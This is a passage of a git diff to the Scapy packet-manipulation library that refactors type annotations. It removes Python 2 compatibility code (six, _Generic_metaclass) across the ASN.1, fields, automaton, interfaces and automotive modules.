# type: ignore if not hasattr(socket, 'IPPROTO_GRE'): - socket.IPPROTO_GRE = 47 + socket.IPPROTO_GRE = 47 # type: ignore if not hasattr(socket, 'IPPROTO_AH'): socket.IPPROTO_AH = 51 if not hasattr(socket, 'IPPROTO_ESP'): @@ -965,8 +965,8 @@ def _route_add_loopback(routes=None, # type: Optional[List[Any]] if iface == conf.loopback_name: conf.route.routes.remove(route) # Remove conf.loopback_name interface - for devname, iface in list(conf.ifaces.items()): - if iface == conf.loopback_name: + for devname, ifname in list(conf.ifaces.items()): + if ifname == conf.loopback_name: conf.ifaces.pop(devname) # Inject interface conf.ifaces["{0XX00000-X000-0X0X-X00X-00XXXX000XXX}"] = adapter diff --git a/scapy/asn1/asn1.py b/scapy/asn1/asn1.py index 266609707cc..c751e55a780 100644 --- a/scapy/asn1/asn1.py +++ b/scapy/asn1/asn1.py @@ -26,12 +26,13 @@ Optional, Tuple, Type, - TypeVar, Union, - _Generic_metaclass, cast, TYPE_CHECKING, ) +from typing import ( + TypeVar, +) if TYPE_CHECKING: from scapy.asn1.ber import BERcodec_Object @@ -278,7 +279,7 @@ class ASN1_Class_UNIVERSAL(ASN1_Class): TIME_TICKS = cast(ASN1Tag, 3 | 0x40) # application-specific encoding -class ASN1_Object_metaclass(_Generic_metaclass): +class ASN1_Object_metaclass(type): def __new__(cls, name, # type: str bases, # type: Tuple[type, ...] diff --git a/scapy/asn1/ber.py b/scapy/asn1/ber.py index 24f28e85905..a848d898977 100644 --- a/scapy/asn1/ber.py +++ b/scapy/asn1/ber.py @@ -39,7 +39,6 @@ Type, TypeVar, Union, - _Generic_metaclass, cast, ) @@ -263,7 +262,7 @@ def BER_tagging_enc(s, hidden_tag=None, implicit_tag=None, explicit_tag=None): # [ BER classes ] # -class BERcodec_metaclass(_Generic_metaclass): +class BERcodec_metaclass(type): def __new__(cls, name, # type: str bases, # type: Tuple[type, ...] diff --git a/scapy/asn1fields.py b/scapy/asn1fields.py index 7e36b6f6037..72359e1dbf3 100644 --- a/scapy/asn1fields.py +++ b/scapy/asn1fields.py @@ -52,11 +52,13 @@ Optional, Tuple, Type, - TypeVar, Union, cast, TYPE_CHECKING, ) +from typing import ( + TypeVar, +) if TYPE_CHECKING: from scapy.asn1packet import ASN1_Packet @@ -181,7 +183,7 @@ def extract_packet(self, try: c = cls(s, _underlayer=_underlayer) except ASN1F_badsequence: - c = packet.Raw(s, _underlayer=_underlayer) + c = packet.Raw(s, _underlayer=_underlayer) # type: ignore cpad = c.getlayer(packet.Raw) s = b"" if cpad is not None: @@ -229,8 +231,8 @@ def __str__(self): return repr(self) def randval(self): - # type: () -> RandField[Any] - return RandInt() + # type: () -> RandField[_I] + return cast(RandField[_I], RandInt()) ############################ @@ -527,7 +529,7 @@ def __init__(self, ): # type: (...) -> None if isinstance(cls, type) and issubclass(cls, ASN1F_field): - self.fld = cast(Type[ASN1F_field[Any, Any]], cls) + self.fld = cls self._extract_packet = lambda s, pkt: self.fld( self.name, b"").m2i(pkt, s) self.holds_packets = 0 @@ -696,7 +698,6 @@ def __init__(self, name, default, *args, **kwargs): else: self.choices[p.ASN1_root.network_tag] = p elif hasattr(p, "ASN1_tag"): - p = cast(Union[ASN1F_PACKET, Type[ASN1F_field[Any, Any]]], p) if isinstance(p, type): # should be ASN1F_field class self.choices[int(p.ASN1_tag)] = p @@ -735,9 +736,8 @@ def m2i(self, pkt, s): ) ) if hasattr(choice, "ASN1_root"): - choice = cast('ASN1_Packet', choice) # we don't want to import ASN1_Packet in this module... - return self.extract_packet(choice, s, _underlayer=pkt) + return self.extract_packet(choice, s, _underlayer=pkt) # type: ignore elif isinstance(choice, type): return choice(self.name, b"").m2i(pkt, s) else: @@ -767,7 +767,7 @@ def randval(self): elif hasattr(p, "ASN1_tag"): if isinstance(p, type): # should be (basic) ASN1F_field class - randchoices.append(p("dummy", None).randval()) # type: ignore + randchoices.append(p("dummy", None).randval()) else: # should be ASN1F_PACKET instance randchoices.append(p.randval()) @@ -841,7 +841,7 @@ def i2m(self, implicit_tag=self.implicit_tag, explicit_tag=self.explicit_tag) - def randval(self): + def randval(self): # type: ignore # type: () -> ASN1_Packet return packet.fuzz(self.cls()) @@ -863,8 +863,10 @@ def __init__(self, ): # type: (...) -> None self.cls = cls - super(ASN1F_BIT_STRING_ENCAPS, self).__init__( - name, default and raw(default), context=context, + super(ASN1F_BIT_STRING_ENCAPS, self).__init__( # type: ignore + name, + default and raw(default), + context=context, implicit_tag=implicit_tag, explicit_tag=explicit_tag ) diff --git a/scapy/asn1packet.py b/scapy/asn1packet.py index 0ca1d0f0117..de6e4954491 100644 --- a/scapy/asn1packet.py +++ b/scapy/asn1packet.py @@ -34,7 +34,10 @@ def __new__(cls, # type: (...) -> Type[ASN1_Packet] if dct["ASN1_root"] is not None: dct["fields_desc"] = dct["ASN1_root"].get_fields_list() - return super(ASN1Packet_metaclass, cls).__new__(cls, name, bases, dct) + return cast( + 'Type[ASN1_Packet]', + super(ASN1Packet_metaclass, cls).__new__(cls, name, bases, dct), + ) class ASN1_Packet(Packet, metaclass=ASN1Packet_metaclass): diff --git a/scapy/automaton.py b/scapy/automaton.py index 87919a085c8..9f90abb2025 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -50,7 +50,6 @@ Type, TypeVar, Union, - _Generic_metaclass, cast, ) @@ -134,7 +133,7 @@ def select_objects(inputs, remain): _T = TypeVar("_T") -class ObjectPipe(Generic[_T], metaclass=_Generic_metaclass): +class ObjectPipe(Generic[_T]): def __init__(self, name=None): # type: (Optional[str]) -> None self.name = name or "ObjectPipe" @@ -626,7 +625,7 @@ def __init__(self, self.atmt.runbg() def send(self, s): - # type: (bytes) -> int + # type: (Union[bytes, Packet]) -> int if not isinstance(s, bytes): s = bytes(s) return self.spa.send(s) @@ -694,7 +693,7 @@ def __new__(cls, name, bases, dct): while classes: c = classes.pop(0) # order is important to avoid breaking method overloading # noqa: E501 classes += list(c.__bases__) - for k, v in c.__dict__.items(): + for k, v in c.__dict__.items(): # type: ignore if k not in members: members[k] = v @@ -902,9 +901,9 @@ def __init__(self, ): # type: (...) -> None if rd is not None and not isinstance(rd, (int, ObjectPipe)): - rd = rd.fileno() # type: ignore + rd = rd.fileno() if wr is not None and not isinstance(wr, (int, ObjectPipe)): - wr = wr.fileno() # type: ignore + wr = wr.fileno() self.rd = rd self.wr = wr @@ -998,8 +997,8 @@ class Singlestep(AutomatonStopped): class InterceptionPoint(AutomatonStopped): def __init__(self, msg, state=None, result=None, packet=None): - # type: (str, Optional[Message], Optional[str], Optional[str]) -> None # noqa: E501 - Automaton.AutomatonStopped.__init__(self, msg, state=state, result=result) # noqa: E501 + # type: (str, Optional[Message], Optional[str], Optional[Packet]) -> None + Automaton.AutomatonStopped.__init__(self, msg, state=state, result=result) self.packet = packet class CommandMessage(AutomatonException): diff --git a/scapy/autorun.py b/scapy/autorun.py index 7cc21633eb5..cd71c29e118 100644 --- a/scapy/autorun.py +++ b/scapy/autorun.py @@ -167,7 +167,7 @@ def autorun_get_interactive_session(cmds, **kargs): try: try: sys.stdout = sys.stderr = sw - sys.excepthook = sys.__excepthook__ # type: ignore + sys.excepthook = sys.__excepthook__ res = autorun_commands_timeout(cmds, **kargs) except StopAutorun as e: e.code_run = sw.s diff --git a/scapy/base_classes.py b/scapy/base_classes.py index 8d68e785070..f464d0b1239 100644 --- a/scapy/base_classes.py +++ b/scapy/base_classes.py @@ -13,6 +13,7 @@ from functools import reduce +import abc import operator import os import random @@ -38,14 +39,16 @@ Type, TypeVar, Union, - _Generic_metaclass, cast, + TYPE_CHECKING, ) -try: - import pyx -except ImportError: - pass +if TYPE_CHECKING: + try: + import pyx + except ImportError: + pass + from scapy.packet import Packet _T = TypeVar("_T") @@ -275,20 +278,20 @@ def __iterlen__(self): # Packet abstract and base classes # ###################################### -class Packet_metaclass(_Generic_metaclass): - def __new__(cls, +class Packet_metaclass(type): + def __new__(cls: Type[_T], name, # type: str bases, # type: Tuple[type, ...] dct # type: Dict[str, Any] ): - # type: (...) -> Type['scapy.packet.Packet'] + # type: (...) -> Type['Packet'] if "fields_desc" in dct: # perform resolution of references to other packets # noqa: E501 current_fld = dct["fields_desc"] # type: List[Union[scapy.fields.Field[Any, Any], Packet_metaclass]] # noqa: E501 resolved_fld = [] # type: List[scapy.fields.Field[Any, Any]] for fld_or_pkt in current_fld: if isinstance(fld_or_pkt, Packet_metaclass): # reference to another fields_desc - for pkt_fld in fld_or_pkt.fields_desc: # type: ignore + for pkt_fld in fld_or_pkt.fields_desc: resolved_fld.append(pkt_fld) else: resolved_fld.append(fld_or_pkt) @@ -296,7 +299,7 @@ def __new__(cls, resolved_fld = [] for b in bases: if hasattr(b, "fields_desc"): - resolved_fld = b.fields_desc # type: ignore + resolved_fld = b.fields_desc break if resolved_fld: # perform default value replacements @@ -343,17 +346,16 @@ def __new__(cls, ]) except (ImportError, AttributeError, KeyError): pass - newcls = cast('Type[scapy.packet.Packet]', - type.__new__(cls, name, bases, dct)) + newcls = cast(Type['Packet'], type.__new__(cls, name, bases, dct)) # Note: below can't be typed because we use attributes # created dynamically.. - newcls.__all_slots__ = set( + newcls.__all_slots__ = set( # type: ignore attr for cls in newcls.__mro__ if hasattr(cls, "__slots__") for attr in cls.__slots__ ) - newcls.aliastypes = ( + newcls.aliastypes = ( # type: ignore [newcls] + getattr(newcls, "aliastypes", []) ) @@ -368,30 +370,30 @@ def __new__(cls, return newcls def __getattr__(self, attr): - # type: (str) -> scapy.fields.Field[Any, Any] - for k in self.fields_desc: # type: ignore + # type: (str) -> Any + for k in self.fields_desc: if k.name == attr: - return k # type: ignore + return k raise AttributeError(attr) def __call__(cls, *args, # type: Any **kargs # type: Any ): - # type: (...) -> 'scapy.packet.Packet' + # type: (...) -> 'Packet' if "dispatch_hook" in cls.__dict__: try: - cls = cls.dispatch_hook(*args, **kargs) # type: ignore + cls = cls.dispatch_hook(*args, **kargs) except Exception: from scapy import config if config.conf.debug_dissector: raise - cls = config.conf.raw_layer # type: ignore + cls = config.conf.raw_layer i = cls.__new__( cls, # type: ignore cls.__name__, cls.__bases__, - cls.__dict__ + cls.__dict__ # type: ignore ) i.__init__(*args, **kargs) return i # type: ignore @@ -399,22 +401,22 @@ def __call__(cls, # Note: see compat.py for an explanation -class Field_metaclass(_Generic_metaclass): - def __new__(cls, +class Field_metaclass(type): + def __new__(cls: Type[_T], name, # type: str bases, # type: Tuple[type, ...] dct # type: Dict[str, Any] ): - # type: (...) -> Type[scapy.fields.Field[Any, Any]] + # type: (...) -> Type[_T] dct.setdefault("__slots__", []) - newcls = super(Field_metaclass, cls).__new__(cls, name, bases, dct) + newcls = type.__new__(cls, name, bases, dct) return newcls # type: ignore PacketList_metaclass = Field_metaclass -class BasePacket(Gen['scapy.packet.Packet']): +class BasePacket(Gen['Packet']): __slots__ = [] # type: List[str] @@ -427,8 +429,9 @@ class BasePacketList(Gen[_T]): class _CanvasDumpExtended(object): - def canvas_dump(self, **kwargs): - # type: (**Any) -> 'pyx.canvas.canvas' + @abc.abstractmethod + def canvas_dump(self, layer_shift=0, rebuild=1): + # type: (int, int) -> pyx.canvas.canvas pass def psdump(self, filename=None, **kargs): diff --git a/scapy/compat.py b/scapy/compat.py index 357922e74ce..71ad94c2959 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -34,12 +34,14 @@ 'Pattern', 'Sequence', 'Set', + 'Self', 'Sized', 'TextIO', 'Tuple', 'Type', 'TypeVar', 'Union', + 'UserDict', 'ValuesView', 'cast', 'overload', @@ -82,18 +84,8 @@ FAKE_TYPING = True TYPE_CHECKING = False -# Import or create fake types - - -# If your class uses a metaclass AND Generic, you'll need to -# extend this class in the metaclass to avoid conflicts... -# Of course we wouldn't need this on Python 3 :/ -class _Generic_metaclass(type): - if FAKE_TYPING: - def __getitem__(self, typ): - # type: (Any) -> Any - return self +# Import or create fake types def _FakeType(name, cls=object): # type: (str, Optional[type]) -> Any @@ -164,7 +156,7 @@ def cast(_type, obj): # type: ignore Iterable = _FakeType("Iterable") # type: ignore Iterator = _FakeType("Iterator") # type: ignore List = _FakeType("List", list) # type: ignore - NewType = _FakeType("NewType") + NewType = _FakeType("NewType") # type: ignore NoReturn = _FakeType("NoReturn") Optional = _FakeType("Optional") Pattern = _FakeType("Pattern") # type: ignore @@ -180,9 +172,6 @@ def cast(_type, obj): # type: ignore class Sized: # type: ignore pass - class Generic(metaclass=_Generic_metaclass): # type: ignore - pass - overload = lambda x: x @@ -193,6 +182,20 @@ class Generic(metaclass=_Generic_metaclass): # type: ignore Literal = _FakeType("Literal") +# Python 3.9 Only +if sys.version_info >= (3, 9): + from collections import UserDict +else: + from collections import UserDict as _UserDict + UserDict = _FakeType("_UserDict", _UserDict) + + +# Python 3.11 Only +if sys.version_info >= (3, 11): + from typing import Self +else: + Self = _FakeType("Self") + ########### # Python3 # ########### diff --git a/scapy/contrib/automotive/ecu.py b/scapy/contrib/automotive/ecu.py index b3cd34ecc10..56f03edcba4 100644 --- a/scapy/contrib/automotive/ecu.py +++ b/scapy/contrib/automotive/ecu.py @@ -504,7 +504,6 @@ def __init__(self, state=None, responses=Raw(b"\x7f\x10"), answers=None): state = cast(List[EcuState], state) self.__states = state else: - state = cast(EcuState, state) self.__states = [state] if isinstance(responses, PacketList): diff --git a/scapy/contrib/automotive/scanner/executor.py b/scapy/contrib/automotive/scanner/executor.py index ea1f3bb5d67..99c1a22ab2b 100644 --- a/scapy/contrib/automotive/scanner/executor.py +++ b/scapy/contrib/automotive/scanner/executor.py @@ -200,7 +200,7 @@ def execute_test_case(self, test_case, kill_time=None): self.check_new_testcases(test_case) if hasattr(test_case, "runtime_estimation"): - estimation = test_case.runtime_estimation() # type: ignore + estimation = test_case.runtime_estimation() if estimation is not None: log_automotive.debug( "[i] Test_case %s: TODO %d, " @@ -243,7 +243,7 @@ def progress(self): for tc in self.configuration.test_cases: if not hasattr(tc, "runtime_estimation"): continue - est = tc.runtime_estimation() # type: ignore + est = tc.runtime_estimation() if est is None: continue progress.append(est[2]) diff --git a/scapy/contrib/automotive/scanner/staged_test_case.py b/scapy/contrib/automotive/scanner/staged_test_case.py index 543327329d1..8c7543a16f1 100644 --- a/scapy/contrib/automotive/scanner/staged_test_case.py +++ b/scapy/contrib/automotive/scanner/staged_test_case.py @@ -254,7 +254,7 @@ def runtime_estimation(self): # type: () -> Optional[Tuple[int, int, float]] if hasattr(self.current_test_case, "runtime_estimation"): - cur_est = self.current_test_case.runtime_estimation() # type: ignore + cur_est = self.current_test_case.runtime_estimation() if cur_est: return len(self.test_cases), \ self.__stage_index, \ diff --git a/scapy/contrib/isotp/isotp_packet.py b/scapy/contrib/isotp/isotp_packet.py index ec346bb1f49..5c6a4d626cd 100644 --- a/scapy/contrib/isotp/isotp_packet.py +++ b/scapy/contrib/isotp/isotp_packet.py @@ -9,7 +9,7 @@ import struct import logging -from scapy.compat import Optional, List, Tuple, Any, Type +from scapy.compat import Optional, List, Tuple, Any, Type, cast from scapy.packet import Packet from scapy.fields import BitField, FlagsField, StrLenField, \ ThreeBytesField, XBitField, ConditionalField, \ @@ -140,7 +140,7 @@ def fragment(self, *args, **kargs): pkt = CAN(identifier=self.rx_id, flags="extended", data=frame_header + frame_data) pkts.append(pkt) - return pkts + return cast(List[Packet], pkts) @staticmethod def defragment(can_frames, use_extended_addressing=None): diff --git a/scapy/contrib/isotp/isotp_scanner.py b/scapy/contrib/isotp/isotp_scanner.py index 0ff7efa7737..6edeeb543bc 100644 --- a/scapy/contrib/isotp/isotp_scanner.py +++ b/scapy/contrib/isotp/isotp_scanner.py @@ -56,7 +56,7 @@ def get_isotp_packet(identifier=0x0, extended=False, extended_can_id=False): """ if extended: - pkt = ISOTPHeaderEA() / ISOTP_FF() + pkt = ISOTPHeaderEA() / ISOTP_FF() # type: Packet pkt.extended_address = 0 pkt.data = b'\x00\x00\x00\x00\x00' else: diff --git a/scapy/contrib/isotp/isotp_utils.py b/scapy/contrib/isotp/isotp_utils.py index 62de7386a55..9b8fce0031e 100644 --- a/scapy/contrib/isotp/isotp_utils.py +++ b/scapy/contrib/isotp/isotp_utils.py @@ -98,7 +98,7 @@ def __init__( self, use_ext_address=None, # type: Optional[bool] rx_id=None, # type: Optional[Union[int, List[int], Iterable[int]]] - basecls=ISOTP # type: Type[Packet] + basecls=ISOTP # type: Type[ISOTP] ): # type: (...) -> None self.ready = [] # type: List[Tuple[int, Optional[int], ISOTPMessageBuilder.Bucket]] # noqa: E501 @@ -155,7 +155,7 @@ def __len__(self): return self.count def pop(self, identifier=None, ext_addr=None): - # type: (Optional[int], Optional[int]) -> Optional[Packet] + # type: (Optional[int], Optional[int]) -> Optional[ISOTP] """Returns a built ISOTP message :param identifier: if not None, only return isotp messages with this @@ -186,9 +186,9 @@ def __iter__(self): @staticmethod def _build( t, # type: Tuple[int, Optional[int], ISOTPMessageBuilder.Bucket] - basecls=ISOTP # type: Type[Packet] + basecls=ISOTP # type: Type[ISOTP] ): - # type: (...) -> Packet + # type: (...) -> ISOTP bucket = t[2] data = bucket.ready or b"" p = basecls(data) diff --git a/scapy/dadict.py b/scapy/dadict.py index 7f611453b99..8062f0bf692 100644 --- a/scapy/dadict.py +++ b/scapy/dadict.py @@ -8,7 +8,6 @@ """ from scapy.error import Scapy_Exception -import scapy.libs.six as six from scapy.compat import plain_str from scapy.compat import ( @@ -19,7 +18,6 @@ List, TypeVar, Union, - cast, ) ############################### @@ -85,12 +83,12 @@ def ident(self, v): def update(self, *args, **kwargs): # type: (*Dict[str, _V], **Dict[str, _V]) -> None - for k, v in six.iteritems(dict(*args, **kwargs)): - self[k] = v + for k, v in dict(*args, **kwargs).items(): + self[k] = v # type: ignore def iterkeys(self): # type: () -> Iterator[_K] - for x in six.iterkeys(self.d): + for x in self.d: if not isinstance(x, str) or x[0] != "_": yield x @@ -104,7 +102,7 @@ def __iter__(self): def itervalues(self): # type: () -> Iterator[_V] - return six.itervalues(self.d) # type: ignore + return self.d.values() # type: ignore def values(self): # type: () -> List[_V] @@ -142,9 +140,9 @@ def __getattr__(self, attr): try: return object.__getattribute__(self, attr) # type: ignore except AttributeError: - for k, v in six.iteritems(self.d): + for k, v in self.d.items(): if self.ident(v) == attr: - return cast(_K, k) + return k raise AttributeError def __dir__(self): diff --git a/scapy/data.py b/scapy/data.py index ae1f9f4fcd3..f6bb34eaf99 100644 --- a/scapy/data.py +++ b/scapy/data.py @@ -16,7 +16,6 @@ from scapy.consts import FREEBSD, NETBSD, OPENBSD, WINDOWS from scapy.error import log_loading from scapy.compat import plain_str -import scapy.libs.six as six from scapy.compat import ( Any, @@ -458,8 +457,7 @@ def reverse_lookup(self, name, case_sensitive=False): else: name = name.lower() filtr = lambda x, l: any(x in z.lower() for z in l) - return {k: v for k, v in six.iteritems(self.d) - if filtr(name, v)} + return {k: v for k, v in self.d.items() if filtr(name, v)} # type: ignore def __dir__(self): # type: () -> List[str] diff --git a/scapy/error.py b/scapy/error.py index e846b86bc40..c5df0679587 100644 --- a/scapy/error.py +++ b/scapy/error.py @@ -15,10 +15,8 @@ import logging import traceback import time -import warnings from scapy.consts import WINDOWS -import scapy.libs.six as six # Typing imports from logging import LogRecord @@ -130,17 +128,6 @@ def format(self, record): # logs when loading Scapy log_loading = logging.getLogger("scapy.loading") -# Apply warnings filters for python 2 -if six.PY2: - try: - with warnings.catch_warnings(): - warnings.simplefilter("ignore") - from cryptography.utils import CryptographyDeprecationWarning - warnings.filterwarnings("ignore", - category=CryptographyDeprecationWarning) - except ImportError: - pass - def warning(x, *args, **kargs): # type: (str, *Any, **Any) -> None diff --git a/scapy/fields.py b/scapy/fields.py index e7033a17885..4e408033010 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -21,6 +21,7 @@ from types import MethodType from uuid import UUID +from enum import Enum from scapy.config import conf from scapy.dadict import DADict @@ -38,14 +39,6 @@ from scapy.base_classes import Gen, Net, BasePacket, Field_metaclass from scapy.error import warning -import scapy.libs.six as six -from scapy.libs.six import integer_types - -try: - from enum import Enum -except ImportError: - Enum = None # type: ignore - # Typing imports from scapy.compat import ( Any, @@ -143,8 +136,7 @@ def update(self, anotherDict): # type: ignore M = TypeVar('M') # Machine storage -@six.add_metaclass(Field_metaclass) -class Field(Generic[I, M]): +class Field(Generic[I, M], metaclass=Field_metaclass): """ For more information on how this works, please refer to the 'Adding new protocols' chapter in the online documentation: @@ -674,11 +666,6 @@ def __getitem__(self, item): # type: ignore item = slice(new_start, new_stop, step) return super(self.__class__, self).__getitem__(item) - if six.PY2: - def __getslice__(self, i, j): - # Python 2 compat - return self.__getitem__(slice(i, j)) - class TrailerField(_FieldContainer): """Special Field that gets its value from the end of the *packet* @@ -753,7 +740,7 @@ def dst_from_pkt(self, pkt): for addr, condition in self.bindings.get(pkt.payload.__class__, []): try: if all(pkt.payload.getfieldval(field) == value - for field, value in six.iteritems(condition)): + for field, value in condition.items()): return addr # type: ignore except AttributeError: pass @@ -1097,7 +1084,7 @@ def m2i(self, pkt, x): def i2repr(self, pkt, x): # type: (Optional[Packet], int) -> str - if isinstance(x, integer_types): + if isinstance(x, int): return '%i' % x return super(NBytesField, self).i2repr(pkt, x) @@ -1118,7 +1105,7 @@ def randval(self): class XNBytesField(NBytesField): def i2repr(self, pkt, x): # type: (Optional[Packet], int) -> str - if isinstance(x, integer_types): + if isinstance(x, int): return '0x%x' % x # x can be a tuple when coming from struct.unpack (from getfield) if isinstance(x, (list, tuple)): @@ -1390,7 +1377,7 @@ def i2len(self, pkt, x): def any2i(self, pkt, x): # type: (Optional[Packet], Any) -> I - if isinstance(x, six.text_type): + if isinstance(x, str): x = bytes_encode(x) return super(_StrField, self).any2i(pkt, x) # type: ignore @@ -1435,7 +1422,7 @@ def h2i(self, pkt, x): def any2i(self, pkt, x): # type: (Optional[Packet], Optional[str]) -> bytes - if isinstance(x, six.text_type): + if isinstance(x, str): return self.h2i(pkt, x) return super(StrFieldUtf16, self).any2i(pkt, x) @@ -1505,7 +1492,7 @@ def i2m(self, return b"" return raw(i) - def m2i(self, pkt, m): + def m2i(self, pkt, m): # type: ignore # type: (Optional[Packet], bytes) -> Packet try: # we want to set parent wherever possible @@ -1513,6 +1500,14 @@ def m2i(self, pkt, m): except TypeError: return self.cls(m) + +class _PacketFieldSingle(_PacketField[K]): + def any2i(self, pkt, x): + # type: (Optional[Packet], Any) -> K + if x and pkt and hasattr(x, "add_parent"): + cast("Packet", x).add_parent(pkt) + return super(_PacketFieldSingle, self).any2i(pkt, x) + def getfield(self, pkt, # type: Packet s, # type: bytes @@ -1524,26 +1519,16 @@ def getfield(self, r = i[conf.padding_layer] del r.underlayer.payload remain = r.load - return remain, i + return remain, i # type: ignore - def randval(self): + +class PacketField(_PacketFieldSingle[BasePacket]): + def randval(self): # type: ignore # type: () -> Packet from scapy.packet import fuzz return fuzz(self.cls()) # type: ignore -class _PacketFieldSingle(_PacketField[K]): - def any2i(self, pkt, x): - # type: (Optional[Packet], Any) -> K - if x and pkt and hasattr(x, "add_parent"): - cast("Packet", x).add_parent(pkt) - return super(_PacketFieldSingle, self).any2i(pkt, x) - - -class PacketField(_PacketFieldSingle[BasePacket]): - pass - - class PacketLenField(_PacketFieldSingle[Optional[BasePacket]]): __slots__ = ["length_from"] @@ -2420,11 +2405,7 @@ def __init__(self, def i2m(self, pkt, x): # type: (Optional[Packet], Optional[Any]) -> int - if six.PY2: - func = FieldLenField.i2m.__func__ - else: - func = FieldLenField.i2m - return func(self, pkt, x) # type: ignore + return FieldLenField.i2m(self, pkt, x) # type: ignore class XBitField(BitField): @@ -2464,7 +2445,7 @@ def __init__(self, self.s2i_cb = enum[1] # type: Optional[Callable[[str], I]] self.i2s = None # type: Optional[Dict[I, str]] self.s2i = None # type: Optional[Dict[str, I]] - elif Enum and isinstance(enum, type) and issubclass(enum, Enum): + elif isinstance(enum, type) and issubclass(enum, Enum): # Python's Enum i2s = self.i2s = {} s2i = self.s2i = {} @@ -2497,7 +2478,7 @@ def __init__(self, def any2i_one(self, pkt, x): # type: (Optional[Packet], Any) -> I - if Enum and isinstance(x, Enum): + if isinstance(x, Enum): return cast(I, x.value) elif isinstance(x, str): if self.s2i: @@ -2566,7 +2547,7 @@ def __init__(self, fmt="1s", # type: str ): # type: (...) -> None - EnumField.__init__(self, name, default, enum, fmt) + super(CharEnumField, self).__init__(name, default, enum, fmt) if self.i2s is not None: k = list(self.i2s) if k and len(k[0]) != 1: @@ -2611,25 +2592,25 @@ def __init__(self, enum, # type: Union[Dict[int, str], Dict[str, int], Tuple[Callable[[int], str], Callable[[str], int]], DADict[int, str]] # noqa: E501 ): # type: (...) -> None - EnumField.__init__(self, name, default, enum, "H") + super(ShortEnumField, self).__init__(name, default, enum, "H") class LEShortEnumField(EnumField[int]): def __init__(self, name, default, enum): # type: (str, int, Union[Dict[int, str], List[str]]) -> None - EnumField.__init__(self, name, default, enum, " None - EnumField.__init__(self, name, default, enum, " None - EnumField.__init__(self, name, default, enum, "B") + super(ByteEnumField, self).__init__(name, default, enum, "B") class XByteEnumField(ByteEnumField): @@ -2651,19 +2632,19 @@ def i2repr_one(self, pkt, x): class IntEnumField(EnumField[int]): def __init__(self, name, default, enum): # type: (str, Optional[int], Dict[int, str]) -> None - EnumField.__init__(self, name, default, enum, "I") + super(IntEnumField, self).__init__(name, default, enum, "I") class SignedIntEnumField(EnumField[int]): def __init__(self, name, default, enum): # type: (str, Optional[int], Dict[int, str]) -> None - EnumField.__init__(self, name, default, enum, "i") + super(SignedIntEnumField, self).__init__(name, default, enum, "i") class LEIntEnumField(EnumField[int]): def __init__(self, name, default, enum): # type: (str, int, Dict[int, str]) -> None - EnumField.__init__(self, name, default, enum, " Union[List[int], int] - return _MultiEnumField.any2i(self, pkt, x) + return _MultiEnumField[int].any2i( + self, # type: ignore + pkt, + x + ) def i2repr( # type: ignore self, @@ -2757,7 +2742,11 @@ def i2repr( # type: ignore x # type: Union[List[int], int] ): # type: (...) -> Union[str, List[str]] - return _MultiEnumField.i2repr(self, pkt, x) + return _MultiEnumField[int].i2repr( + self, # type: ignore + pkt, + x + ) class ByteEnumKeysField(ByteEnumField): @@ -2841,7 +2830,7 @@ def _fixvalue(self, value): # type: (Any) -> int if not value: return 0 - if isinstance(value, six.string_types): + if isinstance(value, str): value = value.split('+') if self.multi else list(value) if isinstance(value, list): y = 0 @@ -2978,7 +2967,7 @@ def __getattr__(self, attr): def __setattr__(self, attr, value): # type: (str, Union[List[str], int, str]) -> None - if attr == "value" and not isinstance(value, six.integer_types): + if attr == "value" and not isinstance(value, int): raise ValueError(value) if attr in self.__slots__: return super(FlagValue, self).__setattr__(attr, value) @@ -3050,7 +3039,7 @@ def __init__(self, # Convert the dict to a list if isinstance(names, dict): tmp = ["bit_%d" % i for i in range(abs(size))] - for i, v in six.viewitems(names): + for i, v in names.items(): tmp[int(math.floor(math.log(i, 2)))] = v names = tmp # Store the names as str or list @@ -3126,7 +3115,7 @@ def any2i(self, pkt, x): these_names = self.names[v] s = set() for i in x: - for val in six.itervalues(these_names): + for val in these_names.values(): if val.short == i: s.add(i) break @@ -3147,7 +3136,7 @@ def i2m(self, pkt, x): if x is None: return r for flag_set in x: - for i, val in six.iteritems(these_names): + for i, val in these_names.items(): if val.short == flag_set: r |= 1 << i break @@ -3179,7 +3168,7 @@ def i2repr(self, pkt, x): r = set() for flag_set in x: - for i in six.itervalues(these_names): + for i in these_names.values(): if i.short == flag_set: r.add("{} ({})".format(i.long, i.short)) break diff --git a/scapy/interfaces.py b/scapy/interfaces.py index 0afc9d7fe2d..53d01e9eb8e 100644 --- a/scapy/interfaces.py +++ b/scapy/interfaces.py @@ -16,9 +16,6 @@ from scapy.utils import pretty_list from scapy.utils6 import in6_isvalid -from scapy.libs.six.moves import UserDict -import scapy.libs.six as six - # Typing imports import scapy from scapy.compat import ( @@ -31,6 +28,7 @@ Tuple, Type, Union, + UserDict, ) @@ -190,20 +188,20 @@ def __radd__(self, other): _GlobInterfaceType = Union[NetworkInterface, str] -class NetworkInterfaceDict(UserDict): +class NetworkInterfaceDict(UserDict[str, NetworkInterface]): """Store information about network interfaces and convert between names""" def __init__(self): # type: () -> None self.providers = {} # type: Dict[Type[InterfaceProvider], InterfaceProvider] # noqa: E501 - UserDict.__init__(self) + super(NetworkInterfaceDict, self).__init__() def _load(self, dat, # type: Dict[str, NetworkInterface] prov, # type: InterfaceProvider ): # type: (...) -> None - for ifname, iface in six.iteritems(dat): + for ifname, iface in dat.items(): if ifname in self.data: # Handle priorities: keep except if libpcap if prov.libpcap: @@ -244,7 +242,7 @@ def dev_from_name(self, name): device name. """ try: - return next(iface for iface in six.itervalues(self) # type: ignore + return next(iface for iface in self.values() if (iface.name == name or iface.description == name)) except (StopIteration, RuntimeError): raise ValueError("Unknown network interface %r" % name) @@ -253,7 +251,7 @@ def dev_from_networkname(self, network_name): # type: (str) -> NoReturn """Return interface for a given network device name.""" try: - return next(iface for iface in six.itervalues(self) # type: ignore + return next(iface for iface in self.values() # type: ignore if iface.network_name == network_name) except (StopIteration, RuntimeError): raise ValueError( @@ -265,7 +263,7 @@ def dev_from_index(self, if_index): """Return interface name from interface index""" try: if_index = int(if_index) # Backward compatibility - return next(iface for iface in six.itervalues(self) # type: ignore + return next(iface for iface in self.values() if iface.index == if_index) except (StopIteration, RuntimeError): if str(if_index) == "1": @@ -324,7 +322,7 @@ def show(self, print_result=True, hidden=False, **kwargs): output = "" for provider in res: output += pretty_list( - res[provider], + res[provider], # type: ignore [("Source",) + provider.headers], sortBy=provider.header_sort ) + "\n" @@ -360,7 +358,7 @@ def get_working_if(): # First check the routing ifaces from best to worse, # 